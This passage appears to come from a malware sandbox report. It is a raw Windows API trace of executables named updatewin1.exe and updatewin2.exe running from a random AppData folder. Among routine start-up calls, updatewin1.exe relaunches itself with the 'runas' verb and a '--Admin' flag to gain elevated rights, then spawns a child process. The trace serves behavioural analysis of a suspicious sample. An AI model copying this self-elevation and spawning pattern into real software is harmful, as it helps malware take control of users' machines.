\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0112.143] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.143] GetLastError () returned 0x57 [0112.143] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0112.143] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0112.144] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0112.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ`ôÝwHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0112.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0112.144] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0112.144] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0112.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ`ôÝwHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0112.144] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x80) returned 0x53a0d0 [0112.144] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe")) returned 0x5f [0112.144] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xc8) returned 0x53c160 [0112.144] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0112.144] GetLastError () returned 0x0 [0112.191] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0112.191] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0112.191] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0112.268] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" " [0112.269] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x53d2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" [0112.269] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc0) returned 0x53d388 [0112.269] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" [0112.269] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5") returned 1 [0112.269] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0112.269] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0113.485] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53d388 | out: hHeap=0x510000) returned 1 [0113.485] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0113.485] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0113.486] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53a0d0 | out: hHeap=0x510000) returned 1 [0113.486] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53cab0 | out: hHeap=0x510000) returned 1 [0113.486] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0113.486] GetLastError () returned 0x57 [0113.486] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0113.486] ExitProcess (uExitCode=0x0) [0113.487] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53a9e8 | out: hHeap=0x510000) returned 1 [0113.488] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 102 os_tid = 0x978 Thread: id = 103 os_tid = 0x648 Thread: id = 104 os_tid = 0x640 Thread: id = 105 os_tid = 0x324 Process: id = "8" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe" page_root = "0x45d05000" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9c8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 100 os_tid = 0x9c4 [0111.354] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x1e55c080, dwHighDateTime=0x1d5fd35)) [0111.355] GetCurrentProcessId () returned 0x9b8 [0111.355] GetCurrentThreadId () returned 0x9c4 [0111.355] GetTickCount () returned 0x114cf70 [0111.355] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23167378527) returned 1 [0111.451] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0111.451] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1f70000 [0111.453] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.453] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0111.453] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0111.454] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0111.454] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0111.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.454] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.454] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.455] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.455] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.455] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.455] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.455] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.456] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.456] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x214) returned 0x1f707d0 [0111.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.456] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.457] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.457] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.457] GetCurrentThreadId () returned 0x9c4 [0111.457] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0111.457] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x800) returned 0x1f709f0 [0111.457] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0111.457] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.457] SetHandleCount (uNumber=0x20) returned 0x20 [0111.457] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe\" " [0111.457] GetEnvironmentStringsW () returned 0x584e70* [0111.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0111.458] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x565) returned 0x1f711f8 [0111.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1f711f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0111.458] FreeEnvironmentStringsW (penv=0x584e70) returned 1 [0111.458] GetLastError () returned 0x0 [0111.458] SetLastError (dwErrCode=0x0) [0111.458] GetLastError () returned 0x0 [0111.458] SetLastError (dwErrCode=0x0) [0111.458] GetLastError () returned 0x0 [0111.458] SetLastError (dwErrCode=0x0) [0111.458] GetACP () returned 0x4e4 [0111.458] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x220) returned 0x1f71768 [0111.458] GetLastError () returned 0x0 [0111.458] SetLastError (dwErrCode=0x0) [0111.458] IsValidCodePage (CodePage=0x4e4) returned 1 [0111.458] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0111.458] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0111.458] GetLastError () returned 0x0 [0111.458] SetLastError (dwErrCode=0x0) [0111.458] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0111.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 